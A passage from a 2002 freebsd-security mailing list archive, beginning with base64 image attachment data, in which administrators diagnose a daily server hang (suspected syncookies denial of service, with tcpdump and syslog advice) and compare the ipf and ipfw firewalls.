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 ------=_NextPart_94915C5ABAF209EF376268C8 Content-Type: image/gif; name="barrainferior-i.gif" Content-Transfer-Encoding: base64 Content-Description: barrainferior-i.gif Content-Id: <147590-22002252219104897211@2> R0lGODlhhQEWAMQAAAAAAHBwcDMzM///AODg4K6urlNTU5mZmRAQEExMLGZmAMDAwICAgP///0BA QH19fSAgIJ6ePmJiQhkZGfDw8GZmZszMzB8fAIyMjEtLS5mZmScnJ/4BAgAAAAAAAAAAACH5BAUU ABwALAAAAACFARYAAAX/YCGOZGmeaKqubOu+cCzPdG3feK7v6+H/wKBwSCwaj8ikcslsOp/QqHRK rVqvx4d2y+16v+CweEwum8/otHrNbrvf8Lh8Pq7Y7/i8fs/nRwCAgBF9hIWGh4iJiouMjY6PkJGS k5SRGZeYmZqbnJ2bEoADoqKAEp6nqKmqq6ytrq+wsbKztLW2t7ICuru8vb6/wL0JAKPFpAnBycrL zM3Oz9DR0tPU1dbX2NnTE9zd3t/g4eLfxMbGAOIOGOsPAhMV6+sC8BgG7+v2GwEYDxsb8hMeYHAg MN64gwgTKlzIsKHDhxAjSpxIseLEQBgzatzIcaOCcqFIgfyokUGDkw0o/yBYgLKBA5YNDgCwcJIB AgooVeKsgOAkhJYNOgodSrSo0aNIkypdyrSp06dQo0olOirkAKscTS4QcPJlTAcOAMAk0LNmgAYL yjoo0GBgAwIATgZwIGCq3bt48+rdy7evX6rmzGVtYMFASggsCSxYIDZlg7MEGjDQGtfl2QUmZZ60 sADD38+gQ4seTbp0oMCCN5pEWaDxSQqN2UY+IJlyV64N2FaofLK16d/AgwsfLhr1OdWEV3tlEIgl hpMEnk9GWzksTpwQqhPfzr279+8cSQUGiZxxV5aYGSCWjPMASwZnKTjwCYD2W0AnD0wGz7+///95 fSReMSOVV5kBMJ0nGXhLFbyHQGQ1AVJBfvi1BOCFGGaoYXgiXVWOhxtB4EB2YCEgAFhgAXAiAiKq 6AACgICVHSAIlBgjinVtqOOOPG53wYdXEfhjj0QWaeSRQw153JBINunkkzqSFIiUUFZp5ZVYZqnl llx26eWXYIYp5phklmnmmWgCEAIAOw== ------=_NextPart_94915C5ABAF209EF376268C8 Content-Type: image/gif; name="barrainferior-d.gif" Content-Transfer-Encoding: base64 Content-Description: barrainferior-d.gif Content-Id: <147590-22002252219104897211@3> R0lGODlhhQEWANUAAP///+/v79/f38zMzL+/v66urpmZmf+AAO94AIyMjIaGht9wAHx8fMxmAHNz c79gAK9YAGZmZp9QAFlZWY9IAFNTU4BAAH9AAEtLS0NDQ3A4AG84AGYzADo6OlcsADMzM1AoACkp KUAgADodACAgIDAYABkZGSAQABAQEAkJCRAIAAAAAP4BAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAUUACwALAAAAACFARYAAAb/wIJw SCwaj8ikcslsOp/QqHRKrVqv2Kx2uzR4v+CweEwum8/otHrNbrvf8Lh8Tq/b72eGfs/v+/+AgYKD hIWGh4iJiouMjY6PkJGSk4MRlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+fGLKztLW2t7i5uru8 vb6/wMHCw8TFxsfIycrLux/Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm59cm6uvs7e7v8PHy8/T1 9vf4+fr7/O0YEyHe/QvY792BAwUTKlzIUN6KhxAjSpxIsaLFixgzatzIsaPHjyBDSnRgIARFkiZF UhQhQqXLlzBjypxJs6ZNkCFqfYhIAoMl/wwoVsgKuuKDLIgdMJB4mHNWBxS0MqRY0ZMW0lkKSp40 MGHWUqgYIB7leHDFhYNo0SKQoGKFiLQHFoB4eEICgrQX3EK4e1CECgkL0Ob9i3aBhYdw0zYo8fBB 4oMN5kZkMACAZQIPGQiwHMBAUAKWQ4cWwOCm6dOoUws1oMCBg6wOHmIwkGDChAQGOkwwEHZFVgM7 UdCeultBVwwdQrDGwMBAhgqsI8xakaJ5awe4U440wMC1l+ReIIYne8DsAQks+4pocGDDChUsWW4o q+IuBZbsL7xFwCG+CscQxHfCCuwFCEJ+K6gnwXkizIdAY+2JsGADInBwUFuZATBABRlksP8TAxpy WAAAmIHmQAYOaPhcAADspNqLMMbI0Wy9+ZabcJ49RIIXOyaQQgcGRGBAbLuFtSNwISRJgnKxdXDi d0kmuUIG3EGE0lYpKVfSeCtwqVFZZ+WVYHnmianBA2g6dkB6DUDk2AVnIZDmAx6UFdF+EIEQ15gP hYkYmY61dNYDD7HX0kMsZiBRohBZ9gFoimZA4kOQymjppZjSaCVvWkbkRQi7ddAcCigl4OMKWrrm WgVMQqRld6quFsGm2kV0JXVefMCllxmBeYCYdvpJwQENwHnWmm8t4Oav8y1g7AUjXBhRCdKuoGeb wf76J4SCHkDoCoFCtFkFEo37EAqWoVD/qaSYrVAppvDGe9psESRJZY5ZRZACCkKWJhxuExRFG1cP pYBbB0utgEKrEGWlVMGo0vZBks3VumkGSfaL48Sdklfmth8v+AAI6a1J4AEQWGBBYBfUdwAFKltQ V1wxtzQhCBrcNVe2wAJq8qDcRlDaBAAEkIAesxIdgAMRVGaAuwBEOinUispr9dUwzQYGAynxC8YE U62wmwEmPPQbUSuYIOQXDjD8kNphPPRBc2BY/BBJX9Q2VQa/fdERmitw8AAHjX0rOOF/zYkmYypc kOZd7p1AwZyMcQBBmoSvsMEDCCwQYOEPHQ76CpNX/gAFD5WeQLtUEuB6Ag9lUIAAARAQXPAKq+/0 KOy4E+Ai1sAHPyNvF6kjfEcdx3hCfCDcxdjx0EcvPU2aTv9RGAp0YOmxcQ1u/ffghy/++OSXb/75 6Kev/vrst+/++/DHL//89Ndv//3456///vz3f3UQADs= ------=_NextPart_84815C5ABAF209EF376268C8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 21:50: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from utility.clubscholarship.com (utility.clubscholarship.com [198.78.70.175]) by hub.freebsd.org (Postfix) with ESMTP id 108E937B413 for ; Tue, 7 May 2002 21:49:48 -0700 (PDT) Received: from localhost (root@localhost) by utility.clubscholarship.com (8.11.6/8.11.6) with ESMTP id g484kbi17930; Tue, 7 May 2002 21:46:37 -0700 (PDT) (envelope-from root@utility.clubscholarship.com) Date: Tue, 7 May 2002 21:46:37 -0700 (PDT) From: Patrick Thomas To: Jason Stone Cc: Subject: Re: what does a syncookies attack look like ? In-Reply-To: <20020507192651.T6630-100000@walter> Message-ID: <20020507214035.B8475-100000@utility.clubscholarship.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > What evidence do you have that you're being attacked? Is it possible that > something on the system has just been misconfigured or something and is > eating up all your resources? The reason we suspect it is an attack - or at least an outside influence - is that the crash/hang occurs at exxactly the same time every day. Of course the first reaction to that would be "probably a cron job" ... however we have ruled that out by setting the system time to the time that it crashes .. at times of the day with analogous (or greater) load than when it really does crash. When we artificially set the time to the "zero hour" nothing happens. However, when that time comes up in the "real world", the server hangs like I described. So, much like you suggested, I was running a once-per minute cron job that tested the following: netstat -m >> /tmp/log ps auxw | wc -l >> /tmp/log ps auxw >> /tmp/log vmstat -m >> /tmp/log vmstat 1 4 >> /tmp/log pstat -s >> /tmp/log vmstat -z >> /tmp/log and there is no interesting output. Even the output one minute before the crash is completely uninteresting. swap usage is _literally_ _zero_. About 1gig total free memory ... and then 30-60 seconds later, before the next cron job can run and collect those stats again, it crashes - always at the exact same time. Any other metrics I should be looking at besides the ones I have ? tcpdump on the machine itself and on the firewall reveals nothing interesting. Not an interesting level of traffic in terms of transactions or bandwidth. We're going crazy here trying to figure it out. We are running the very first 4.5-RELEASE, and we have so far only patched the included sshd, and done the chmod on the `keylink` file or whatever it waw that was suid root. Otherwise it is a stock very first release of 4.5-RELEASE. thanks for any suggestions/help, PT To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 23:57:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from host185.dolanmedia.com (host185.dolanmedia.com [209.98.197.185]) by hub.freebsd.org (Postfix) with SMTP id 720FD37B400 for ; Tue, 7 May 2002 23:57:47 -0700 (PDT) Received: (qmail 41607 invoked by uid 0); 8 May 2002 06:57:47 -0000 Received: from greg.panula@dolaninformation.com by proxy with qmail-scanner-0.96 (. Clean. Processed in 0.357568 secs); 08 May 2002 06:57:47 -0000 X-Qmail-Scanner-Mail-From: greg.panula@dolaninformation.com via proxy X-Qmail-Scanner-Rcpt-To: root@utility.clubscholarship.com,freebsd-security@freebsd.org X-Qmail-Scanner: 0.96 (No viruses found. Processed in 0.357568 secs) Received: from unknown (HELO mail.dolanmedia.com) (10.1.1.23) by 10.1.1.10 with SMTP; 8 May 2002 06:57:46 -0000 Received: from dolaninformation.com (10.1.1.135) by mail.dolanmedia.com (Worldmail 1.3.167); 8 May 2002 01:57:46 -0500 Message-ID: <3CD8CC69.47021F06@dolaninformation.com> Date: Wed, 08 May 2002 01:57:45 -0500 From: Greg Panula Reply-To: greg.panula@dolaninformation.com Organization: Dolan Information Center Inc X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Patrick Thomas Cc: freebsd-security@freebsd.org Subject: Re: what does a syncookies attack look like ? References: <20020507214035.B8475-100000@utility.clubscholarship.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Patrick Thomas wrote: > > The reason we suspect it is an attack - or at least an outside influence - > is that the crash/hang occurs at exxactly the same time every day. Of > course the first reaction to that would be "probably a cron job" ... > however we have ruled that out by setting the system time to the time that > it crashes .. at times of the day with analogous (or greater) load than > when it really does crash. When we artificially set the time to the "zero > hour" nothing happens. > > However, when that time comes up in the "real world", the server hangs > like I described. . . . > tcpdump on the machine itself and on the firewall reveals nothing > interesting. Not an interesting level of traffic in terms of transactions > or bandwidth. We're going crazy here trying to figure it out. We are > running the very first 4.5-RELEASE, and we have so far only patched the > included sshd, and done the chmod on the `keylink` file or whatever it waw > that was suid root. Otherwise it is a stock very first release of > 4.5-RELEASE. > > thanks for any suggestions/help, > The answer to your problem it probably related to security advisory: FreeBSD-SA-02:20 "syncache/syncookies denial of service" The full text of the advisory can be found at: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02%3A20.syncache.asc All of the security advisories can be found at: http://www.freebsd.org/security/index.html#adv A google search for 'syncookies' or 'synflooding' should turn up some useful information about SYN flooding and the use syncookies as a defense. I found a quick description at: http://www.incidents.org/diary/november01/110801.php "On some operating systems it is possible to configure the kernel to use a SYN flood protection mechanism known as SYNcookies. The idea is that, if the server should detect a SYN flood attack, it can stop keeping state on waiting-to-be- completed three way handshakes, and switch to a challenge-response mechanism for accepting new connections. When in "flood protection mode" the server embeds a cryptographically strong "cookie" in the TCP header of each SYN-ACK it sends. This cookie is a state-keeping mechanism. If a real client is actually engaged on the other end of the connection, the client will automatically return the cookie to the server when responding with the final ACK of the three-way-handshake. Thus, the server can completely forget about the connection after sending the SYN-ACK, because all the state data required to establish the new connection arrives in the final ACK. " Good luck, Greg  To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 0: 5:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from utility.clubscholarship.com (utility.clubscholarship.com [198.78.70.175]) by hub.freebsd.org (Postfix) with ESMTP id 4BC3037B409 for ; Wed, 8 May 2002 00:05:05 -0700 (PDT) Received: from localhost (root@localhost) by utility.clubscholarship.com (8.11.6/8.11.6) with ESMTP id g4871pA22132; Wed, 8 May 2002 00:01:51 -0700 (PDT) (envelope-from root@utility.clubscholarship.com) Date: Wed, 8 May 2002 00:01:51 -0700 (PDT) From: Patrick Thomas To: Greg Panula Cc: Subject: Re: what does a syncookies attack look like ? In-Reply-To: <3CD8CC69.47021F06@dolaninformation.com> Message-ID: <20020507235944.S8475-100000@utility.clubscholarship.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org thank you - however based on my description of the crash (kernel seems to be running, userland is not) people here seem to feel it is not a syncookies attack. They seem to think a syncookies attack would be a much harder crash/lock. This last email of mine was simply describing why I think it is an attack in general - just not sure yet what kind. Do you have other information that leads you to believe a syncookies attack could indeed lead to the kind of strange lockup I am describing ? thanks. On Wed, 8 May 2002, Greg Panula wrote: > Patrick Thomas wrote: > > > > The reason we suspect it is an attack - or at least an outside influence - > > is that the crash/hang occurs at exxactly the same time every day. Of > > course the first reaction to that would be "probably a cron job" ... > > however we have ruled that out by setting the system time to the time that > > it crashes .. at times of the day with analogous (or greater) load than > > when it really does crash. When we artificially set the time to the "zero > > hour" nothing happens. > > > > However, when that time comes up in the "real world", the server hangs > > like I described. > . > . > . > > tcpdump on the machine itself and on the firewall reveals nothing > > interesting. Not an interesting level of traffic in terms of transactions > > or bandwidth. We're going crazy here trying to figure it out. We are > > running the very first 4.5-RELEASE, and we have so far only patched the > > included sshd, and done the chmod on the `keylink` file or whatever it waw > > that was suid root. Otherwise it is a stock very first release of > > 4.5-RELEASE. > > > > thanks for any suggestions/help, > > > > The answer to your problem it probably related to security advisory: > FreeBSD-SA-02:20 "syncache/syncookies denial of service" > > The full text of the advisory can be found at: > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02%3A20.syncache.asc > > All of the security advisories can be found at: > http://www.freebsd.org/security/index.html#adv > > > A google search for 'syncookies' or 'synflooding' should turn up some useful > information about SYN flooding and the use syncookies as a defense. > > I found a quick description at: > http://www.incidents.org/diary/november01/110801.php > > "On some operating systems it is possible to configure the > kernel to use a SYN flood protection mechanism known as > SYNcookies. The idea is that, if the server should detect > a SYN flood attack, it can stop keeping state on waiting-to-be- > completed three way handshakes, and switch to a challenge-response > mechanism for accepting new connections. > > When in "flood protection mode" the server embeds a cryptographically > strong "cookie" in the TCP header of each SYN-ACK it sends. This > cookie is a state-keeping mechanism. If a real client is actually > engaged on the other end of the connection, the client will > automatically return the cookie to the server when responding > with the final ACK of the three-way-handshake. Thus, the server > can completely forget about the connection after sending the > SYN-ACK, because all the state data required to establish the > new connection arrives in the final ACK. " > > Good luck, > Greg >  > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 1:10:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from host185.dolanmedia.com (host185.dolanmedia.com [209.98.197.185]) by hub.freebsd.org (Postfix) with SMTP id 0E4B237B40B for ; Wed, 8 May 2002 01:10:44 -0700 (PDT) Received: (qmail 72503 invoked by uid 0); 8 May 2002 08:10:43 -0000 Received: from greg.panula@dolaninformation.com by proxy with qmail-scanner-0.96 (. Clean. Processed in 0.316654 secs); 08 May 2002 08:10:43 -0000 X-Qmail-Scanner-Mail-From: greg.panula@dolaninformation.com via proxy X-Qmail-Scanner-Rcpt-To: root@utility.clubscholarship.com,freebsd-security@freebsd.org X-Qmail-Scanner: 0.96 (No viruses found. Processed in 0.316654 secs) Received: from unknown (HELO mail.dolanmedia.com) (10.1.1.23) by 10.1.1.10 with SMTP; 8 May 2002 08:10:42 -0000 Received: from dolaninformation.com (10.1.1.135) by mail.dolanmedia.com (Worldmail 1.3.167); 8 May 2002 03:10:42 -0500 Message-ID: <3CD8DD82.924A1DCB@dolaninformation.com> Date: Wed, 08 May 2002 03:10:42 -0500 From: Greg Panula Reply-To: greg.panula@dolaninformation.com Organization: Dolan Information Center Inc X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Patrick Thomas Cc: freebsd-security@freebsd.org Subject: Re: what does a syncookies attack look like ? References: <20020507235944.S8475-100000@utility.clubscholarship.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Nope, I've been lucky enough to not experience any strange lock-ups that weren't my own doing. And Jason covered those; file & process descriptors. You just mentioned syncookie and you hadn't applied the related the patch. So, I made blind guess. When the server crashes is the console responsive? You'll probably need to gather a tcpdumps from a couple of crashes to allow you to find a pattern/attack traffic. Just remember to set the snarf length to 1500. Something like 'tcpdump -s 1500 -w dump1.tcp -n host ' will write the raw stream of all traffic involving your server's ip address to dump1.tcp and then you can use ethereal to browse thru the traffic. From there it is pretty much a process of elimination; eliminate the legitimate traffic and then figure out what the questionable traffic is. Probably not what you want to hear, just because you'll have to suffer thru at least two more crashes. As for what an actual syn attack might look like, snort's database/rule-set is probably the best bet. You might even be able to feed a captured stream thru snort and have it spit out what it thinks. Optionally you could try applying the workaround of disabling syncookies, probably a long-shot but shouldn't hurt to try. Are there any other machines on your network that are accessing the crashing server at the "zero hour"? Could it be possible they are kicking off a fatal process? You could also try an entry like: *.* /var/log/messages and/or *.* /dev/console in your /etc/syslog.conf. Maybe you'll get lucky and capture a useful message before the server crashes. Remember to HUP syslogd after making the change. Good luck, Greg Patrick Thomas wrote: > > thank you - however based on my description of the crash (kernel seems to > be running, userland is not) people here seem to feel it is not a > syncookies attack. They seem to think a syncookies attack would be a much > harder crash/lock. > > This last email of mine was simply describing why I think it is an attack > in general - just not sure yet what kind. > > Do you have other information that leads you to believe a syncookies > attack could indeed lead to the kind of strange lockup I am describing ? > > thanks. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 1:55:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 0500437B405 for ; Wed, 8 May 2002 01:55:39 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: "Tom Limoncelli" , References: <3CD8558E.2FA68C36@lumeta.com> Subject: Re: ipf vs. ipfw MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020508085539.0500437B405@hub.freebsd.org> Date: Wed, 8 May 2002 01:55:39 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I use ipf, and recently some people have asked me about ipfw that I > couldn't answer. Hopefully people on this list can enlighten me. I use both, on the same machines (!). There are features that I need from both. > Are ipf and ipfw different interfaces to the same in-kernel filtering > mechanism? It doesn't look like it is, but I'd like that confirmed. Nope, totally different. In my experience ipf (and related ipnat) seem to go deeper into the kernel and play more tricks. In cases they bypass portions of the normal routing etc... I prefer ipnat (to natd) for NAT as it's all done in kernel mode. ipfw has dummynet and all that. Also the forwarding mechanism (which we use here for source based routing) is cleaner there in my opinion. ipf has a more complete syntax for the firewall. It also makes it easier to add and remove rules at will without knowing the previous structure of the firewall. We use this for jails a lot. > Why does FreeBSD have both? Is it because ipf is generic (ported to > Solaris, IRIX, OpenBSD, etc) and ipfw is specifically designed for > FreeBSD? That's what I thought. It's nice to have a choice too. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 2:12:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 4CF3037B404 for ; Wed, 8 May 2002 02:12:50 -0700 (PDT) Received: from cairo.anu.edu.au (localhost [127.0.0.1]) by cairo.anu.edu.au (8.12.0/8.12.0) with ESMTP id g489Cj3g019047; Wed, 8 May 2002 19:12:46 +1000 (EST) Received: (from avalon@localhost) by cairo.anu.edu.au (8.12.0/8.12.0.Beta16) id g489CjUv019045; Wed, 8 May 2002 19:12:45 +1000 (EST) From: Darren Reed Message-Id: <200205080912.g489CjUv019045@cairo.anu.edu.au> Subject: Re: ipf vs. ipfw To: aragon@phat.za.net (Aragon Gouveia) Date: Wed, 8 May 2002 19:12:45 +1000 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG, tal@lumeta.com (Tom Limoncelli) In-Reply-To: <001101c1f626$10d61420$01000001@aragon> from "Aragon Gouveia" at May 08, 2002 02:19:48 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Aragon Gouveia, sie said: > > Also, ipfw is the interface to FreeBSD's very cool dummynet(4) traffic > shaper. > > I haven't used ipf personally. Does it have builtin support for traffic > shaping? Weighted Fair Queueing? No, ipf does not do this. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 2:16:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by 